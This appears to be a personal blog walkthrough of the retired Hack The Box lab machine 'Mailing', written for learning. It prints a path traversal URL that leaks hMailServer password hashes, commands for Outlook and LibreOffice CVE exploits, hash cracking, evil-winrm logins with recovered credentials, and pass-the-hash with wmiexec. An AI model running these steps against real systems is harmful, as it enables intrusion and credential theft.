Mailing HTB

Written By Sam Lewis

Mailing was an easy Windows machine on Hack The Box. I had to wait until it was retired to post a walkthrough for it, didn’t want to violate their ToS. I booted up the machine and grabbed the IP address. I then ran an nmap scan for all open ports, and then another for version and script scan on all of the open ports. 

nmap -p- 10.10.11.14  


PORT      STATE SERVICE
25/tcp    open  smtp
80/tcp    open  http
110/tcp   open  pop3
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
143/tcp   open  imap
445/tcp   open  microsoft-ds
465/tcp   open  smtps
587/tcp   open  submission
993/tcp   open  imaps
5040/tcp  open  unknown
5985/tcp  open  wsman
7680/tcp  open  pando-pub
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
59533/tcp open  unknown

nmap -sV -sC -p 25,80,110,135,139,143,445,465,587,993,5040,5985,7680,47001,49664,49665,49666,49667,49668,59533 10.10.11.14


PORT      STATE SERVICE       VERSION
25/tcp    open  smtp          hMailServer smtpd
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://mailing.htb
|_http-server-header: Microsoft-IIS/10.0
110/tcp   open  pop3          hMailServer pop3d
|_pop3-capabilities: UIDL TOP USER
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
143/tcp   open  imap          hMailServer imapd
|_imap-capabilities: IMAP4 QUOTA IMAP4rev1 CHILDREN RIGHTS=texkA0001 IDLE completed SORT OK CAPABILITY ACL NAMESPACE
445/tcp   open  microsoft-ds?
465/tcp   open  ssl/smtp      hMailServer smtpd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
| smtp-commands: mailing.htb, SIZE 20480000, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
587/tcp   open  smtp          hMailServer smtpd
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
| smtp-commands: mailing.htb, SIZE 20480000, STARTTLS, AUTH LOGIN PLAIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
|_ssl-date: TLS randomness does not represent time
993/tcp   open  ssl/imap      hMailServer imapd
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mailing.htb/organizationName=Mailing Ltd/stateOrProvinceName=EU\Spain/countryName=EU
| Not valid before: 2024-02-27T18:24:10
|_Not valid after:  2029-10-06T18:24:10
|_imap-capabilities: IMAP4 QUOTA IMAP4rev1 CHILDREN RIGHTS=texkA0001 IDLE completed SORT OK CAPABILITY ACL NAMESPACE
5040/tcp  open  unknown
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp  open  pando-pub?
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
59533/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: mailing.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-09-01T22:41:17
|_  start_date: N/A

I saw in the nmap scan that the domain was mailing.htb, so I added that to my /etc/hosts file, then went to the page in my browser.

I noticed a button at the bottom for “Download Instructions”, so I clicked on that which lead me to a pdf file on how to set up email accounts on an email client. Within it, there was also an email address for a user “Maya”. I also noticed the URL for everything involved “file=page.php”. So I tested for LFI in the URL. I looked at the download.php file first, which came back with the following: 

Download.php

<?php
if (isset($_GET['file'])) {
    $file = $_GET['file'];

    $file_path = 'C:/wwwroot/instructions/' . $file;
    if (file_exists($file_path)) {
        
        header('Content-Description: File Transfer');
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="'.basename($file_path).'"');
        header('Expires: 0');
        header('Cache-Control: must-revalidate');
        header('Pragma: public');
        header('Content-Length: ' . filesize($file_path));
        echo(file_get_contents($file_path));
        exit;
    } else {
        echo "File not found.";
    }
} else {
    echo "No file specified for download.";
}
?>

Since this worked for me, and I was able to see the file path it was using. I then hit Google to look more into hMAilServer and came across a verified File Inclusion exploit: https://www.exploit-db.com/exploits/7012

Within this documentation, it gives you some URL’s to try, which one of them worked for me!

http://mailing.htb/download.php?file=..%5C..%5C..%5CProgram+Files+(x86)%5ChMailServer%5CBin%5ChMailServer.INI
[Directories]
ProgramFolder=C:\Program Files (x86)\hMailServer
DatabaseFolder=C:\Program Files (x86)\hMailServer\Database
DataFolder=C:\Program Files (x86)\hMailServer\Data
LogFolder=C:\Program Files (x86)\hMailServer\Logs
TempFolder=C:\Program Files (x86)\hMailServer\Temp
EventFolder=C:\Program Files (x86)\hMailServer\Events
[GUILanguages]
ValidLanguages=english,swedish
[Security]
AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7
[Database]
Type=MSSQLCE
Username=
Password=0a9f8ad8bf896b501dde74f08efd7e4c
PasswordEncryption=1
Port=0
Server=
Database=hMailServer
Internal=1

Once I used the correct URL, I was able to see a password hash for administrator. Took that to Crackstaiton and got the password of homenetworkingadministrator

With that, I did some more googling and found this exploit for Microsoft Outlook that seemed to fit the criteria of what I needed now that I had credentials. https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability

I ran the exploit including the server name, port 587, username of administrator, the password I obtained, and then included the other known email address of maya@mailing.htb that I found earlier.

Almost instantly I got a hash for the user maya! I needed to crack the hash, so I booted up John. 

maya::MAILING:9eba9657e897eda4:599AAE03B4D5BAE6FCC3538D65F18753:0101000000000000803D32FEB0FCDA012C74BC55306BD59C0000000002000800450030004F004C0001001E00570049004E002D00560050003700590046004A0046004200490049004F0004003400570049004E002D00560050003700590046004A0046004200490049004F002E00450030004F004C002E004C004F00430041004C0003001400450030004F004C002E004C004F00430041004C0005001400450030004F004C002E004C004F00430041004C0007000800803D32FEB0FCDA0106000400020000000800300030000000000000000000000000200000DA729E7FD8D14FDCE2B11C0ABAF4B8EB17C909471D5E7C22955C5AA627636C080A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00350039000000000000000000
john --format=netntlmv2 hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

John helped me crack the hash and secured a password for maya, m4y4ngs4ri. From there, I looked at the ports again to see how I can use these credentials, and realized winrm was running. So I booted up evil-winrm and was able to login!

evil-winrm -i 10.10.11.14 -u maya -p m4y4ngs4ri

Once I got here I was stuck for a little bit. Tried running WinPEAS, looking at all kinds of directories looking for anything I might be able to leverage for PE. I find a file that was a little out of place, it was a LibreOffice file. I looked at the version of LibreOffice for this which was 7.4. I then googled for any known exploits for this version and it took a little digging, but I found one. https://github.com/elweth-sec/CVE-2023-2255

I ran the exploit with a command to add maya to the net localgroup Administrators group, which created a malcious .odt file. From there, I uploaded it to the target machine. From there, I ran the odt file and was granted those privs. After that I downloaded the SAM and SYSTEM files and dumped the hashes. I was able to get a hash for localadmin. After this, I used wmiexec to try and login. 

python3 CVE-2023-2255.py --cmd 'net localgroup Administrators maya /add'
impacket-wmiexec localadmin@10.10.11.14 -hashes aad3b435b51404eeaad3b435b51404ee:9aa582783780d1546d62f2d102daefae

Overall this was a pretty challenging box. It was rated as easy, but the priv esc portion had me rethinking a lot as I was stuck for quite some time trying to figure it out.

-Sam

Sam Lewis
Next

My Journey to the GIAC Red Team Professional Certification (GRTP)